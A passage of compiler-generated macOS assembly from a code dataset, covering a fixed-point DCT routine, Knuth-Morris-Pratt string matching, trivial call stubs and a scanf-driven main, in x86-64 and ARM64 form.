%bb.26: ## in Loop: Header=BB1_25 Depth=2 movl -420(%rbp), %eax movl %eax, %ecx leaq -272(%rbp), %rax shlq $4, %rcx addq %rcx, %rax movl -424(%rbp), %ecx ## kill: def $rcx killed $ecx movw (%rax,%rcx,2), %dx movq -416(%rbp), %rax movl -424(%rbp), %ecx ## kill: def $rcx killed $ecx shlq $4, %rcx addq %rcx, %rax movl -420(%rbp), %ecx ## kill: def $rcx killed $ecx movw %dx, (%rax,%rcx,2) ## %bb.27: ## in Loop: Header=BB1_25 Depth=2 movl -420(%rbp), %eax addl $1, %eax movl %eax, -420(%rbp) jmp LBB1_25 LBB1_28: ## in Loop: Header=BB1_22 Depth=1 jmp LBB1_29 LBB1_29: ## in Loop: Header=BB1_22 Depth=1 movl -424(%rbp), %eax addl $1, %eax movl %eax, -424(%rbp) jmp LBB1_22 LBB1_30: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB1_32 ## %bb.31: addq $432, %rsp ## imm = 0x1B0 popq %rbp retq LBB1_32: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _read_data ## -- Begin function read_data .p2align 4, 0x90 _read_data: ## @read_data .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -8(%rbp), %rdi movl $64, %esi movb $0, %al callq __ssdm_SpecArrayDimSize movq -16(%rbp), %rdi movl $8, %esi movb $0, %al callq __ssdm_SpecArrayDimSize ## %bb.1: movl $0, -20(%rbp) LBB2_2: ## =>This Loop Header: Depth=1 ## Child Loop BB2_5 Depth 2 cmpl $8, -20(%rbp) jge LBB2_10 ## %bb.3: ## in Loop: Header=BB2_2 Depth=1 jmp LBB2_4 LBB2_4: ## in Loop: Header=BB2_2 Depth=1 movl $0, -24(%rbp) LBB2_5: ## Parent Loop BB2_2 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $8, -24(%rbp) jge LBB2_8 ## %bb.6: ## in Loop: Header=BB2_5 Depth=2 movq -8(%rbp), %rax movl -20(%rbp), %ecx shll $3, %ecx addl -24(%rbp), %ecx movslq %ecx, %rcx movw (%rax,%rcx,2), %dx movq -16(%rbp), %rax movslq -20(%rbp), %rcx shlq $4, %rcx addq %rcx, %rax movslq -24(%rbp), %rcx movw %dx, (%rax,%rcx,2) ## %bb.7: ## in Loop: Header=BB2_5 Depth=2 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB2_5 LBB2_8: ## in Loop: Header=BB2_2 Depth=1 jmp LBB2_9 LBB2_9: ## in Loop: Header=BB2_2 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB2_2 LBB2_10: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _write_data ## -- Begin function write_data .p2align 4, 0x90 _write_data: ## @write_data .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -16(%rbp), %rdi movl $64, %esi movb $0, %al callq __ssdm_SpecArrayDimSize movq -8(%rbp), %rdi movl $8, %esi movb $0, %al callq __ssdm_SpecArrayDimSize ## %bb.1: movl $0, -20(%rbp) LBB3_2: ## =>This Loop Header: Depth=1 ## Child Loop BB3_5 Depth 2 cmpl $8, -20(%rbp) jge LBB3_10 ## %bb.3: ## in Loop: Header=BB3_2 Depth=1 jmp LBB3_4 LBB3_4: ## in Loop: Header=BB3_2 Depth=1 movl $0, -24(%rbp) LBB3_5: ## Parent Loop BB3_2 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $8, -24(%rbp) jge LBB3_8 ## %bb.6: ## in Loop: Header=BB3_5 Depth=2 movq -8(%rbp), %rax movslq -20(%rbp), %rcx shlq $4, %rcx addq %rcx, %rax movslq -24(%rbp), %rcx movw (%rax,%rcx,2), %dx movq -16(%rbp), %rax movl -20(%rbp), %ecx shll $3, %ecx addl -24(%rbp), %ecx movslq %ecx, %rcx movw %dx, (%rax,%rcx,2) ## %bb.7: ## in Loop: Header=BB3_5 Depth=2 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB3_5 LBB3_8: ## in Loop: Header=BB3_2 Depth=1 jmp LBB3_9 LBB3_9: ## in Loop: Header=BB3_2 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB3_2 LBB3_10: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _dct ## -- Begin function dct .p2align 4, 0x90 _dct: ## @dct .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $288, %rsp ## imm = 0x120 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -280(%rbp) movq %rsi, -288(%rbp) movq -288(%rbp), %rdi movl $64, %esi movb $0, %al callq __ssdm_SpecArrayDimSize movq -280(%rbp), %rdi movl $64, %esi movb $0, %al callq __ssdm_SpecArrayDimSize movq -280(%rbp), %rdi leaq -144(%rbp), %rsi callq _read_data leaq -144(%rbp), %rdi leaq -272(%rbp), %rsi callq _dct_2d leaq -272(%rbp), %rdi movq -288(%rbp), %rsi callq _write_data movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB4_2 ## %bb.1: addq $288, %rsp ## imm = 0x120 popq %rbp retq LBB4_2: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__const .p2align 4 ## @__const.dct_1d.dct_coeff_table l___const.dct_1d.dct_coeff_table: .short 8192 ## 0x2000 .short 8192 ## 0x2000 .short 8192 ## 0x2000 .short 8192 ## 0x2000 .short 8192 ## 0x2000 .short 8192 ## 0x2000 .short 8192 ## 0x2000 .short 8192 ## 0x2000 .short 11363 ## 0x2c63 .short 9633 ## 0x25a1 .short 6436 ## 0x1924 .short 2260 ## 0x8d4 .short 63276 ## 0xf72c .short 59100 ## 0xe6dc .short 55904 ## 0xda60 .short 54174 ## 0xd39e .short 10703 ## 0x29cf .short 4433 ## 0x1151 .short 61103 ## 0xeeaf .short 54833 ## 0xd631 .short 54833 ## 0xd631 .short 61103 ## 0xeeaf .short 4433 ## 0x1151 .short 10703 ## 0x29cf .short 9633 ## 0x25a1 .short 63276 ## 0xf72c .short 54174 ## 0xd39e .short 59100 ## 0xe6dc .short 6436 ## 0x1924 .short 11363 ## 0x2c63 .short 2260 ## 0x8d4 .short 55904 ## 0xda60 .short 8192 ## 0x2000 .short 57344 ## 0xe000 .short 57344 ## 0xe000 .short 8192 ## 0x2000 .short 8192 ## 0x2000 .short 57345 ## 0xe001 .short 57345 ## 0xe001 .short 8192 ## 0x2000 .short 6436 ## 0x1924 .short 54174 ## 0xd39e .short 2260 ## 0x8d4 .short 9633 ## 0x25a1 .short 55904 ## 0xda60 .short 63276 ## 0xf72c .short 11363 ## 0x2c63 .short 59100 ## 0xe6dc .short 4433 ## 0x1151 .short 54833 ## 0xd631 .short 10703 ## 0x29cf .short 61103 ## 0xeeaf .short 61103 ## 0xeeaf .short 10703 ## 0x29cf .short 54833 ## 0xd631 .short 4433 ## 0x1151 .short 2260 ## 0x8d4 .short 59100 ## 0xe6dc .short 9633 ## 0x25a1 .short 54174 ## 0xd39e .short 11363 ## 0x2c63 .short 55904 ## 0xda60 .short 6436 ## 0x1924 .short 63276 ## 0xf72c .subsections_via_symbols
the_stack_data/23575472.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _make_next ; -- Begin function make_next .p2align 2 _make_next: ; @make_next .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str x1, [sp, #16] ldur x0, [x29, #-8] bl _strlen mov x8, x0 str w8, [sp, #4] ldr x8, [sp, #16] str wzr, [x8] mov w8, #1 str w8, [sp, #12] str wzr, [sp, #8] b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_3 Depth 2 ldr w8, [sp, #12] ldr w9, [sp, #4] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_11 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 b LBB0_3 LBB0_3: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #8] subs w8, w8, #0 cset w8, le mov w9, #0 str w9, [sp] ; 4-byte Folded Spill tbnz w8, #0, LBB0_5 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=2 ldur x8, [x29, #-8] ldrsw x9, [sp, #12] ldrsb w8, [x8, x9] ldur x9, [x29, #-8] ldrsw x10, [sp, #8] ldrsb w9, [x9, x10] subs w8, w8, w9 cset w8, ne str w8, [sp] ; 4-byte Folded Spill b LBB0_5 LBB0_5: ; in Loop: Header=BB0_3 Depth=2 ldr w8, [sp] ; 4-byte Folded Reload tbz w8, #0, LBB0_7 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_3 Depth=2 ldr x8, [sp, #16] ldr w9, [sp, #8] subs w9, w9, #1 ldr w8, [x8, w9, sxtw #2] str w8, [sp, #8] b LBB0_3 LBB0_7: ; in Loop: Header=BB0_1 Depth=1 ldur x8, [x29, #-8] ldrsw x9, [sp, #12] ldrsb w8, [x8, x9] ldur x9, [x29, #-8] ldrsw x10, [sp, #8] ldrsb w9, [x9, x10] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB0_9 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB0_9 LBB0_9: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #8] ldr x9, [sp, #16] ldrsw x10, [sp, #12] str w8, [x9, x10, lsl #2] b LBB0_10 LBB0_10: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB0_1 LBB0_11: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _kmp ; -- Begin function kmp .p2align 2 _kmp: ; @kmp .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur x1, [x29, #-16] str x2, [sp, #24] ldur x0, [x29, #-8] bl _strlen mov x8, x0 str w8, [sp, #20] ldur x0, [x29, #-16] bl _strlen mov x8, x0 str w8, [sp, #16] ldur x0, [x29, #-16] ldr x1, [sp, #24] bl _make_next str wzr, [sp, #12] str wzr, [sp, #8] b LBB1_1 LBB1_1: ; =>This Loop Header: Depth=1 ; Child Loop BB1_3 Depth 2 ldr w8, [sp, #12] ldr w9, [sp, #20] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_13 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 b LBB1_3 LBB1_3: ; Parent Loop BB1_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #8] subs w8, w8, #0 cset w8, le mov w9, #0 str w9, [sp, #4] ; 4-byte Folded Spill tbnz w8, #0, LBB1_5 b LBB1_4 LBB1_4: ; in Loop: Header=BB1_3 Depth=2 ldur x8, [x29, #-16] ldrsw x9, [sp, #8] ldrsb w8, [x8, x9] ldur x9, [x29, #-8] ldrsw x10, [sp, #12] ldrsb w9, [x9, x10] subs w8, w8, w9 cset w8, ne str w8, [sp, #4] ; 4-byte Folded Spill b LBB1_5 LBB1_5: ; in Loop: Header=BB1_3 Depth=2 ldr w8, [sp, #4] ; 4-byte Folded Reload tbz w8, #0, LBB1_7 b LBB1_6 LBB1_6: ; in Loop: Header=BB1_3 Depth=2 ldr x8, [sp, #24] ldr w9, [sp, #8] subs w9, w9, #1 ldr w8, [x8, w9, sxtw #2] str w8, [sp, #8] b LBB1_3 LBB1_7: ; in Loop: Header=BB1_1 Depth=1 ldur x8, [x29, #-16] ldrsw x9, [sp, #8] ldrsb w8, [x8, x9] ldur x9, [x29, #-8] ldrsw x10, [sp, #12] ldrsb w9, [x9, x10] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB1_9 b LBB1_8 LBB1_8: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB1_9 LBB1_9: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #8] ldr w9, [sp, #16] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB1_11 b LBB1_10 LBB1_10: b LBB1_13 LBB1_11: ; in Loop: Header=BB1_1 Depth=1 b LBB1_12 LBB1_12: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB1_1 LBB1_13: ldr w8, [sp, #12] ldr w9, [sp, #8] subs w8, w8, w9 add w0, w8, #1 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #160 .cfi_def_cfa_offset 160 stp x29, x30, [sp, #144] ; 16-byte Folded Spill add x29, sp, #144 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] mov w1, #0 str wzr, [sp, #52] add x0, sp, #56 str x0, [sp, #16] ; 8-byte Folded Spill mov x2, #80 bl _memset ldr x2, [sp, #16] ; 8-byte Folded Reload adrp x8, l_.str@PAGE add x8, x8, l_.str@PAGEOFF str x8, [sp, #40] adrp x8, l_.str.1@PAGE add x8, x8, l_.str.1@PAGEOFF str x8, [sp, #32] ldr x0, [sp, #40] ldr x1, [sp, #32] bl _kmp str w0, [sp, #28] ldr w9, [sp, #28] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf str wzr, [sp, #48] b LBB2_1 LBB2_1: ; =>This Inner Loop Header: Depth=1 ldrsw x8, [sp, #48] str x8, [sp, #8] ; 8-byte Folded Spill ldr x0, [sp, #32] bl _strlen ldr x8, [sp, #8] ; 8-byte Folded Reload subs x8, x8, x0 cset w8, hs tbnz w8, #0, LBB2_4 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 ldrsw x9, [sp, #48] add x8, sp, #56 ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB2_3 LBB2_3: ; in Loop: Header=BB2_1 Depth=1 ldr w8, [sp, #48] add w8, w8, #1 str w8, [sp, #48] b LBB2_1 LBB2_4: adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB2_6 b LBB2_5 LBB2_5: bl ___stack_chk_fail LBB2_6: mov w0, #0 ldp x29, x30, [sp, #144] ; 16-byte Folded Reload add sp, sp, #160 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "ababxbababababcdababcabddcadfdsss" l_.str.1: ; @.str.1 .asciz "abcabd" l_.str.2: ; @.str.2 .asciz "match pattern : %d\n" l_.str.3: ; @.str.3 .asciz "%4d" l_.str.4: ; @.str.4 .asciz "\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _make_next ## -- Begin function make_next .p2align 4, 0x90 _make_next: ## @make_next .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -8(%rbp), %rdi callq _strlen ## kill: def $eax killed $eax killed $rax movl %eax, -28(%rbp) movq -16(%rbp), %rax movl $0, (%rax) movl $1, -20(%rbp) movl $0, -24(%rbp) LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_3 Depth 2 movl -20(%rbp), %eax cmpl -28(%rbp), %eax jge LBB0_11 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_3 LBB0_3: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, -24(%rbp) movb %al, -29(%rbp) ## 1-byte Spill jle LBB0_5 ## %bb.4: ## in Loop: Header=BB0_3 Depth=2 movq -8(%rbp), %rax movslq -20(%rbp), %rcx movsbl (%rax,%rcx), %eax movq -8(%rbp), %rcx movslq -24(%rbp), %rdx movsbl (%rcx,%rdx), %ecx cmpl %ecx, %eax setne %al movb %al, -29(%rbp) ## 1-byte Spill LBB0_5: ## in Loop: Header=BB0_3 Depth=2 movb -29(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB0_6 jmp LBB0_7 LBB0_6: ## in Loop: Header=BB0_3 Depth=2 movq -16(%rbp), %rax movl -24(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movl (%rax,%rcx,4), %eax movl %eax, -24(%rbp) jmp LBB0_3 LBB0_7: ## in Loop: Header=BB0_1 Depth=1 movq -8(%rbp), %rax movslq -20(%rbp), %rcx movsbl (%rax,%rcx), %eax movq -8(%rbp), %rcx movslq -24(%rbp), %rdx movsbl (%rcx,%rdx), %ecx cmpl %ecx, %eax jne LBB0_9 ## %bb.8: ## in Loop: Header=BB0_1 Depth=1 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) LBB0_9: ## in Loop: Header=BB0_1 Depth=1 movl -24(%rbp), %edx movq -16(%rbp), %rax movslq -20(%rbp), %rcx movl %edx, (%rax,%rcx,4) ## %bb.10: ## in Loop: Header=BB0_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB0_1 LBB0_11: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _kmp ## -- Begin function kmp .p2align 4, 0x90 _kmp: ## @kmp .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movq -8(%rbp), %rdi callq _strlen ## kill: def $eax killed $eax killed $rax movl %eax, -28(%rbp) movq -16(%rbp), %rdi callq _strlen ## kill: def $eax killed $eax killed $rax movl %eax, -32(%rbp) movq -16(%rbp), %rdi movq -24(%rbp), %rsi callq _make_next movl $0, -36(%rbp) movl $0, -40(%rbp) LBB1_1: ## =>This Loop Header: Depth=1 ## Child Loop BB1_3 Depth 2 movl -36(%rbp), %eax cmpl -28(%rbp), %eax jge LBB1_13 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_3 LBB1_3: ## Parent Loop BB1_1 Depth=1 ## => This Inner Loop Header: Depth=2 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, -40(%rbp) movb %al, -41(%rbp) ## 1-byte Spill jle LBB1_5 ## %bb.4: ## in Loop: Header=BB1_3 Depth=2 movq -16(%rbp), %rax movslq -40(%rbp), %rcx movsbl (%rax,%rcx), %eax movq -8(%rbp), %rcx movslq -36(%rbp), %rdx movsbl (%rcx,%rdx), %ecx cmpl %ecx, %eax setne %al movb %al, -41(%rbp) ## 1-byte Spill LBB1_5: ## in Loop: Header=BB1_3 Depth=2 movb -41(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_6 jmp LBB1_7 LBB1_6: ## in Loop: Header=BB1_3 Depth=2 movq -24(%rbp), %rax movl -40(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movl (%rax,%rcx,4), %eax movl %eax, -40(%rbp) jmp LBB1_3 LBB1_7: ## in Loop: Header=BB1_1 Depth=1 movq -16(%rbp), %rax movslq -40(%rbp), %rcx movsbl (%rax,%rcx), %eax movq -8(%rbp), %rcx movslq -36(%rbp), %rdx movsbl (%rcx,%rdx), %ecx cmpl %ecx, %eax jne LBB1_9 ## %bb.8: ## in Loop: Header=BB1_1 Depth=1 movl -40(%rbp), %eax addl $1, %eax movl %eax, -40(%rbp) LBB1_9: ## in Loop: Header=BB1_1 Depth=1 movl -40(%rbp), %eax cmpl -32(%rbp), %eax jne LBB1_11 ## %bb.10: jmp LBB1_13 LBB1_11: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_12 LBB1_12: ## in Loop: Header=BB1_1 Depth=1 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB1_1 LBB1_13: movl -36(%rbp), %eax subl -40(%rbp), %eax addl $1, %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $144, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -100(%rbp) leaq -96(%rbp), %rdi xorl %esi, %esi movl $80, %edx callq _memset leaq L_.str(%rip), %rax movq %rax, -112(%rbp) leaq L_.str.1(%rip), %rax movq %rax, -120(%rbp) movq -112(%rbp), %rdi movq -120(%rbp), %rsi leaq -96(%rbp), %rdx callq _kmp movl %eax, -124(%rbp) movl -124(%rbp), %esi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movl $0, -104(%rbp) LBB2_1: ## =>This Inner Loop Header: Depth=1 movslq -104(%rbp), %rax movq %rax, -136(%rbp) ## 8-byte Spill movq -120(%rbp), %rdi callq _strlen movq %rax, %rcx movq -136(%rbp), %rax ## 8-byte Reload cmpq %rcx, %rax jae LBB2_4 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 movslq -104(%rbp), %rax movl -96(%rbp,%rax,4), %esi leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf ## %bb.3: ## in Loop: Header=BB2_1 Depth=1 movl -104(%rbp), %eax addl $1, %eax movl %eax, -104(%rbp) jmp LBB2_1 LBB2_4: leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB2_6 ## %bb.5: xorl %eax, %eax addq $144, %rsp popq %rbp retq LBB2_6: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "ababxbababababcdababcabddcadfdsss" L_.str.1: ## @.str.1 .asciz "abcabd" L_.str.2: ## @.str.2 .asciz "match pattern : %d\n" L_.str.3: ## @.str.3 .asciz "%4d" L_.str.4: ## @.str.4 .asciz "\n" .subsections_via_symbols
the_stack_data/94123.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _bar ; -- Begin function bar .p2align 2 _bar: ; @bar .cfi_startproc ; %bb.0: ret .cfi_endproc ; -- End function .globl _i_want_bar ; -- Begin function i_want_bar .p2align 2 _i_want_bar: ; @i_want_bar .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 bl _bar ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _bar ## -- Begin function bar .p2align 4, 0x90 _bar: ## @bar .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp popq %rbp retq .cfi_endproc ## -- End function .globl _i_want_bar ## -- Begin function i_want_bar .p2align 4, 0x90 _i_want_bar: ## @i_want_bar .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp callq _bar popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/923860.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 sub sp, sp, #112 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] stur wzr, [x29, #-12] stur wzr, [x29, #-24] stur xzr, [x29, #-32] stur xzr, [x29, #-40] sub sp, sp, #16 mov x9, sp sub x8, x29, #16 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf add sp, sp, #16 ldur w8, [x29, #-16] ; kill: def $x8 killed $w8 mov x9, sp stur x9, [x29, #-48] lsl x9, x8, #2 add x9, x9, #15 and x9, x9, #0xfffffffffffffff0 stur x9, [x29, #-96] ; 8-byte Folded Spill adrp x16, ___chkstk_darwin@GOTPAGE ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF] blr x16 ldur x10, [x29, #-96] ; 8-byte Folded Reload mov x9, sp subs x9, x9, x10 mov sp, x9 stur x9, [x29, #-88] ; 8-byte Folded Spill stur x8, [x29, #-56] ldur w8, [x29, #-16] ; kill: def $x8 killed $w8 lsr x9, x8, #0 add x9, x9, #15 and x9, x9, #0xfffffffffffffff0 stur x9, [x29, #-80] ; 8-byte Folded Spill adrp x16, ___chkstk_darwin@GOTPAGE ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF] blr x16 ldur x10, [x29, #-80] ; 8-byte Folded Reload mov x9, sp subs x9, x9, x10 mov sp, x9 stur x9, [x29, #-72] ; 8-byte Folded Spill stur x8, [x29, #-64] stur wzr, [x29, #-20] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-20] ldur w9, [x29, #-16] subs w8, w8, w9 cset w8, hs tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldur x8, [x29, #-88] ; 8-byte Folded Reload ldur w9, [x29, #-20] ; kill: def $x9 killed $w9 add x8, x8, x9, lsl #2 sub sp, sp, #16 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf ldur x9, [x29, #-88] ; 8-byte Folded Reload ldur x8, [x29, #-72] ; 8-byte Folded Reload add sp, sp, #16 ldur w10, [x29, #-20] ; kill: def $x10 killed $w10 ldr w9, [x9, x10, lsl #2] mov x10, x9 ldur x9, [x29, #-32] add x9, x9, x10 stur x9, [x29, #-32] ldur w9, [x29, #-20] ; kill: def $x9 killed $w9 add x8, x8, x9 strb wzr, [x8] b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB0_1 LBB0_4: stur wzr, [x29, #-20] b LBB0_5 LBB0_5: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-20] adds w8, w8, #1 cset w8, eq mov w9, #0 stur w9, [x29, #-100] ; 4-byte Folded Spill tbnz w8, #0, LBB0_7 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_5 Depth=1 ldur w8, [x29, #-20] ldur w9, [x29, #-16] subs w8, w8, w9 cset w8, lo stur w8, [x29, #-100] ; 4-byte Folded Spill b LBB0_7 LBB0_7: ; in Loop: Header=BB0_5 Depth=1 ldur w8, [x29, #-100] ; 4-byte Folded Reload tbz w8, #0, LBB0_17 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_5 Depth=1 ldur x8, [x29, #-72] ; 8-byte Folded Reload ldur w9, [x29, #-20] ; kill: def $x9 killed $w9 ldrb w8, [x8, x9] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_10 b LBB0_9 LBB0_9: ; in Loop: Header=BB0_5 Depth=1 ldur x8, [x29, #-72] ; 8-byte Folded Reload ldur w9, [x29, #-24] add w9, w9, #1 stur w9, [x29, #-24] ldur w9, [x29, #-20] ; kill: def $x9 killed $w9 add x9, x8, x9 mov w8, #1 strb w8, [x9] b LBB0_10 LBB0_10: ; in Loop: Header=BB0_5 Depth=1 ldur x8, [x29, #-88] ; 8-byte Folded 